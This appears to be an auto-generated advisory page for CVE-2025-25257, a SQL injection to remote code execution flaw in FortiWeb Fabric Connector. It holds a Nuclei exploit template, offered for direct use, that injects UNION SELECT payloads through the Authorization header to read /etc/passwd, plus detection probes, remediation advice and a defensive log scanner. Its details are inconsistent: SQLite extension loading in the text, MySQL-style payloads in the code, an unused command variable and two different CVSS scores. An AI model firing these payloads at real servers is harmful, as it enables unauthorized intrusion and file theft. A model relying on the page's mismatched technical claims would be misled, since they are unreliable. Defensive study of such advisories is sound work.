[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
CVE-2025-25257
FortiWeb Fabric Connector 7.6.x contains a SQL injection vulnerability that can lead to unauthenticated remote code execution.
Critical · CVSS 9.8
📋 Basic Vulnerability Information
| CVE | CVE-2025-25257 |
|---|---|
| Vulnerability type | SQL injection leading to remote code execution |
| Affected versions | FortiWeb Fabric Connector 7.6.0, 7.6.1 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-02-04 |
| Submitted by | Milad Karimi (Ex3ptionaL) |
| Source | Exploit-DB original ↗ |
🔬 Root Cause
Fabric Connector does not properly sanitize user input when handling certain HTTP request parameters, so crafted SQL can be injected into the underlying database; through SQLite's extension-loading mechanism a malicious shared library can then be loaded, ultimately yielding remote code execution.
🎯 Attack Scenario
1. Preconditions: the target runs FortiWeb Fabric Connector 7.6.0 or 7.6.1, and the Fabric Connector service port is reachable.
2. The attacker sends a crafted HTTP request to the Fabric Connector containing a malicious SQL injection payload.
3. The payload uses SQLite's ATTACH DATABASE and load_extension functions to upload and load a malicious .so or .dll file.
4. The malicious code executes; the attacker obtains a remote shell on the target or runs arbitrary commands.
5. Indicator of success: the attacker confirms control through a reverse shell or the output of executed commands.
💥 Impact
An attacker can take full control of an affected system: remote code execution, data exfiltration, privilege escalation and subsequent lateral movement, a severe threat to system security.
⚔️ Nuclei Exploit Template
The following exploitation template is in standard Nuclei v3 format and can be used directly for vulnerability verification:

```yaml
id: CVE-2025-25257-exploit

info:
  name: FortiWeb Fabric Connector SQL Injection to RCE
  author: your-generated-template
  severity: critical
  description: Exploits CVE-2025-25257 to achieve pre-authentication SQL injection and potential Remote Code Execution on FortiWeb Fabric Connector
  reference:
    - https://www.exploit-db.com/exploits/52003
  classification:
    cvss-score: 9.1
    cve-id: CVE-2025-25257
  tags: fortinet,fortiweb,rce,sqli

variables:
  cmd: "id"

http:
  - raw:
      - |
        GET /api/fabric/device/status HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer aaa' UNION SELECT @@version,@@hostname,@@datadir,user(),database(),version(),@@basedir,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null -- -
        Connection: close
      - |
        GET /api/fabric/device/status HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer aaa' UNION SELECT LOAD_FILE('/etc/passwd'),@@hostname,@@datadir,user(),database(),version(),@@basedir,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null -- -
        Connection: close
      - |
        GET /api/fabric/device/status HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer aaa' UNION SELECT LOAD_FILE(CONCAT('/','etc','/passwd')),@@hostname,@@datadir,user(),database(),version(),@@basedir,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null -- -
        Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - 'root:.*:0:0:'
          - 'uid=\d+\([a-z]+\)'
          - 'gid=\d+\([a-z]+\)'
        condition: or
```

🔍 Nuclei Detection Template
The following detection template is used to determine whether a target is affected:

```yaml
id: CVE-2025-25257-detection

info:
  name: FortiWeb Fabric Connector SQL Injection Detection
  author: your-generated-template
  severity: high
  description: Detects FortiWeb Fabric Connector version and potential SQL Injection vulnerability (CVE-2025-25257)
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-25257
  classification:
    cvss-score: 9.1
    cve-id: CVE-2025-25257
  tags: fortinet,fortiweb,rce,sqli,unauth

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/fabric/device/status'
    headers:
      Authorization: "Bearer aaa' OR '1'='1"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'deviceId'
          - 'status'
          - 'name'
        condition: or
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/api/v2.0/system/info'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - 'FortiWeb-\d{3}[A-Z]?'
          - 'FortiWeb\s+\d+\.\d+'
        condition: or
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/login'
    headers:
      Authorization: "Bearer aaa' OR '1'='1"

    matchers:
      - type: word
        words:
          - 'FortiWeb'
          - 'fortinet'
        condition: or
        internal: true
```

🛡️ Remediation
Upgrade to FortiWeb Fabric Connector 7.6.2 or later. Interim mitigations: restrict network access to the Fabric Connector port, and use a web application firewall to filter SQL injection signatures.
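As an added detection example (not code from the original advisory, Exploit-DB or Fortinet), the following Python scans proxy or WAF access-log lines for the pattern this page describes: a request to the Fabric Connector API whose Bearer token is not an opaque token but carries SQL injection indicators. The log line format, the field names and the sample lines are assumptions constructed for this example; adapt LOG_RE to the real log format.

```python
import re
from typing import Dict, List, Optional

# Assumed log line shape (constructed for this example; adapt LOG_RE to your proxy/WAF format):
#   <client_ip> "<METHOD> <path>" <status> "Authorization: <header value>"
LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
                    r'"Authorization: (?P<auth>[^"]*)"$')

# A legitimate bearer token is opaque (base64url / JWT alphabet); quotes, spaces or
# parentheses never belong in one, which is what makes the page's payloads stand out.
TOKEN_OK = re.compile(r'^[A-Za-z0-9_\-.=]+$')

# Indicators taken from the payloads shown in the templates above (MySQL-style UNION /
# LOAD_FILE) plus the SQLite extension-loading primitives named in the root-cause section.
INDICATORS = {
    "quote_then_boolean": re.compile(r"'\s*(?:union|or|and)\b", re.I),  # aaa' UNION ..., aaa' OR '1'='1
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "load_extension": re.compile(r"\bload_extension\s*\(", re.I),
    "attach_database": re.compile(r"\battach\s+database\b", re.I),
    "trailing_comment": re.compile(r"--\s*-?\s*$"),
}

def inspect_line(line: str) -> Optional[Dict[str, object]]:
    """Return an alert dict when the Bearer token is malformed and carries SQLi indicators, else None."""
    m = LOG_RE.match(line.strip())
    if not m or not m["auth"].startswith("Bearer "):
        return None
    token = m["auth"][len("Bearer "):]
    if TOKEN_OK.match(token):
        return None  # well-formed opaque token: nothing to flag
    hits = [name for name, rx in INDICATORS.items() if rx.search(token)]
    if not hits:
        return None
    # A 200 on the Fabric Connector API with an injected token is the high-severity case:
    # the Authorization value reached the SQL layer and the query still succeeded.
    return {"ip": m["ip"], "path": m["path"], "status": int(m["status"]),
            "indicators": hits, "fabric_api": m["path"].startswith("/api/fabric/")}

def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run inspect_line over a batch of log lines and return only the alerts."""
    return [a for a in (inspect_line(l) for l in lines) if a]

# Constructed sample lines (not real traffic): one benign JWT-style token, two injected tokens.
SAMPLE_LOG = [
    '198.51.100.7 "GET /api/fabric/device/status" 200 "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.c2ln"',
    '203.0.113.9 "GET /api/fabric/device/status" 200 "Authorization: Bearer aaa\' UNION SELECT LOAD_FILE(\'/etc/passwd\'),null -- -"',
    '203.0.113.9 "GET /login" 200 "Authorization: Bearer aaa\' OR \'1\'=\'1"',
]
```

Because the check keys on the token's shape first and on signatures second, a WAF rule built the same way (reject any Bearer value outside the token alphabet on /api/fabric/) blocks the whole class of payloads rather than the specific strings in the templates.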
📎 References
- https://www.fortiguard.com/psirt/FG-IR-25-001
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25257
- Exploit-DB original
⚠️ This article is based on public vulnerability databases and is intended only for security research and defensive reference. Generated: 2026-05-07 06:23 | Source: Exploit-DB